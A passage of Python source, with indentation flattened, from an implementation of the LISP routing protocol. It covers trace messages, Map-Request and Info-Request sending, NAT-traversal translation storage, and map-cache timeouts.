itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (eid in lisp_pubsub_cache):
pubsub = lisp_pubsub_cache[eid]
if (self.xtr_id in pubsub):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace(object):
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#entry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in list(lisp_map_servers_list.values()):
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in list(lisp_map_servers_list.values()): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in list(lisp_map_resolvers_list.values()):
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in list(lisp_map_resolvers_list.values()):
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Check IGMP packet first. And don't do IP checksum and don't test TTL.
#
if (ord(packet[9:10]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(dest):
now = lisp_get_timestamp()
#
# Do we have rate-limiting disabled temporarily?
#
elapsed = now - lisp_no_map_request_rate_limit
if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
dprint("No Rate-Limit Mode for another {} secs".format(left))
return(False)
#endif
#
# Do we send a Map-Request recently?
#
if (lisp_last_map_request_sent == None): return(False)
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format( \
green(dest.print_address(), False), round(elapsed, 3)))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc,
pubsub=False):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port as 4341 so we the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
map_request.subscribe_bit = pubsub
map_request.xtr_id_present = pubsub
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. Reason being is because source address may not be the probed
# destination. And on our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
if (probe_dest.is_ipv4() and probe_dest.is_multicast_address()):
dest = probe_dest
else:
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
#endif
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for Map-Request rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have Info-Requests from the lisp-
# itr and lisp-etr process both add and delete host routes (for Info-
# Request sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# wait for the host route to go away before proceeding. We will use
# the map-server host route as a IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devies.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(list(rtr_list.values()))):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), list(rtr_list.keys())))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (addr_str in lisp_rtr_list):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in list(lisp_iid_to_interface.keys()):
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
last_refresh_time = mc.last_refresh_time
#
# If mapping system runs on this system, disregard packet activity.
# There could be a race condition for active sources, where destinations
# are not registered yet due to system restart. If the LISP subsystem
# is within 5 minutes of restarting, time out native-forward entries.
#
if (lisp_is_running("lisp-ms") and lisp_uptime + (5*60) >= now):
if (mc.action == LISP_NATIVE_FORWARD_ACTION):
last_refresh_time = 0
lprint("Remove startup-mode native-forward map-cache entry")
#endif
#endif
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Do not time out NAT-traversal default entries (0.0.0.0/0 and 0::/0).
#
if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
return([True, delete_list])
#endif
#
# Timed out.
#
ut = lisp_print_elapsed(mc.uptime)
lrt = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint(("Map-cache entry {} {}, had uptime {}, last-refresh-time {}"). \
format(green(prefix_str, False), bold("timed out", False), ut, lrt))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from lisp_referral_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
